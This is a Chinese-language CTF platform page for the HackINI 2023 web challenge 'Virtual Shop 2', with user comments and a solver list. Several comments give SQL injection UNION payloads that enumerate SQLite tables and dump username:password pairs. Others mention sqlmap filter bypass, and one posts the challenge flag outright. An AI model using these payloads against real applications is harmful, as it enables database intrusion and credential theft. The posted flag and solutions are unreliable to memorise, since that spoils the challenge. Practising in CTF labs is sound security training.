Virtual Shop 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 275
提  示:
描  述:
I'm not making the same mistake again this time, you can't guess my\ \ tables now.\n \n\n **Author**: F100w
评论
你不懂的吧 6月前

3、查出具体表的字段: ' union SELECT pw789,null,null,null FROM UsEErrSS1337987 --+

回复 0

你不懂的吧 6月前

1、查出表有哪些表: ' union SELECT name,null,null,null FROM sqlite_master WHERE type='table' ; 2、查出表有哪些列 :' union SELECT sql,null,null,null FROM sqlite_master WHERE type='table' AND name='UsEErrSS1337987';

回复 1

smtall 7月前

sqlmap使用hex编码提取数据(绕过限制)

回复 0

MoCaser 10月前

我......我......我一把梭战神口牙!!

回复 0

lq61618 1年前

shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0

xiaobai568 1年前

我写了个WP,描述了手工注入的过程

回复 0

啊这这 1年前

我的sqlmap没跑出来 用的level3 不过我花了十几分钟学了一下sqlite使用 做出来了 还是不错的

回复 0
xiaoxiao972521 1年前

不晓得,sqlmap一把过

回复 0

justsosoloveyou 2年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(usnme324||':'||pw789) FROM UsEErrSS1337987)--+

回复 0

zhangye 2年前

sqlmap跑时把之前跑的文件删了,不然给的是1的flag

回复 2

hopeinhand 2年前

sqlmap一把梭

回复 0

WriteUp

image
sanshi

1 金币

评分(0)

暂无评分

解题动态

Air51930 攻破了该题 7天前
绪言qaq 攻破了该题 19天前
hbynb 攻破了该题 19天前
luck1219 攻破了该题 22天前
hengdonghui 攻破了该题 24天前
eason2023 攻破了该题 26天前
zrc2682 攻破了该题 27天前
Ethan552525 攻破了该题 28天前
out不慢 攻破了该题 1月前
gongyy 攻破了该题 1月前
btfwufeng 攻破了该题 1月前
liang123456 攻破了该题 1月前
solomom 攻破了该题 1月前
鸡小哲 攻破了该题 1月前
caocao 攻破了该题 1月前
ndaygril 攻破了该题 1月前
wyyyy 攻破了该题 1月前
minz 攻破了该题 1月前
soha 攻破了该题 1月前
jc11459487 攻破了该题 1月前
问题反馈